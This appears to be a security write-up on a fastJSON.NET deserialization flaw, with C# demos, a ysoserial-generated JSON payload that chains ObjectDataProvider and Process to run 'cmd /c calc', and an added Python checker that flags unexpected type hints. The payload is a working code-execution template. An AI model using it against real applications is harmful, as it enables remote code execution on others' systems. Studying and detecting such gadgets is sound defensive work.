https://github.com/Y4er/dotnet-deserialization/blob/main/Fastjson.md
Fastjson (fastJSON version 2.2.4)
It is much the same as the Java one.
This article explains the deserialization vulnerability in fastjson.net.
Demo
```csharp
using fastJSON;
using System;

namespace Fastjson.NetSerializer
{
    class Person
    {
        public string Name { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Person person = new Person();
            person.Name = "jack";
            // Serialize the object to JSON
            string json = JSON.ToJSON(person);
            Console.WriteLine(json);
            // Deserialize the JSON back into a Person
            Person p = JSON.ToObject<Person>(json);
            Console.WriteLine(p.Name);
            Console.ReadKey();
        }
    }
}
```
Here the ToObject function is used to convert the JSON into an object.
The gadget is in fact still the ObjectDataProvider class.
PoC generated by yso:
```json
{
    "$types": {
        "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35": "1",
        "System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089": "2",
        "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089": "3"
    },
    "$type": "1",
    "ObjectInstance": {
        "$type": "2",
        "StartInfo": {
            "$type": "3",
            "FileName": "cmd",
            "Arguments": "/c calc"
        }
    },
    "MethodName": "Start"
}
```
Demo
```csharp
using fastJSON;
using System;
using System.IO;

namespace Fastjson
{
    class Person
    {
        public string Name { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Person person = new Person();
            person.Name = "jack";
            string json = JSON.ToJSON(person);
            Console.WriteLine(json);
            // The JSON is read from a file here, i.e. it is attacker-controllable
            Person p = JSON.ToObject<Person>(File.ReadAllText("1.json"));
            Console.WriteLine(p.Name);
            Console.ReadKey();
        }
    }
}
```
The key questions are whether the JSON is controllable and whether the Fastjson version in use is vulnerable.
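The check below is an added example, not code from the repository: it resolves the `$types` table and every `$type` hint in a fastJSON payload and reports any CLR type outside the allow-list expected for the target type, so it can gate input before `ToObject<T>` or flag the gadget above in captured request bodies. The allow-list name `Fastjson.Person` is assumed from the demo's namespace, and the sample payloads are constructed here.

```python
import json

# Constructed sample shaped like the yso payload above: a global type table
# ({full type name: id}) plus numeric "$type" references into it.
GADGET_JSON = """{
    "$types": {
        "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35": "1",
        "System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089": "2",
        "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089": "3"
    },
    "$type": "1",
    "ObjectInstance": {"$type": "2", "StartInfo": {"$type": "3", "FileName": "cmd"}},
    "MethodName": "Start"
}"""

# Constructed benign payload matching what the Person demo expects.
BENIGN_JSON = '{"Name": "jack"}'


def collect_type_hints(doc):
    """Return every CLR type name the payload asks the deserializer to instantiate.
    Handles both the global "$types" table (id -> full name) and inline "$type" names."""
    global_types = {}
    if isinstance(doc, dict) and isinstance(doc.get("$types"), dict):
        # fastJSON stores the table as {full type name: "id"}; invert it for lookup.
        global_types = {v: k for k, v in doc["$types"].items()}
    found = set()

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "$type" and isinstance(value, str):
                    # Numeric ids resolve through the table; full names are used as-is.
                    found.add(global_types.get(value, value))
                elif key != "$types":
                    walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(doc)
    return found


def find_unexpected_types(payload, allowed_types):
    """Type hints (namespace-qualified, assembly part stripped) not in the allow-list."""
    hints = {t.split(",")[0].strip() for t in collect_type_hints(json.loads(payload))}
    return sorted(hints - set(allowed_types))


def is_safe_for(payload, allowed_types):
    """Gate to run before JSON.ToObject<T>: True only if no unexpected type is requested."""
    return not find_unexpected_types(payload, allowed_types)
```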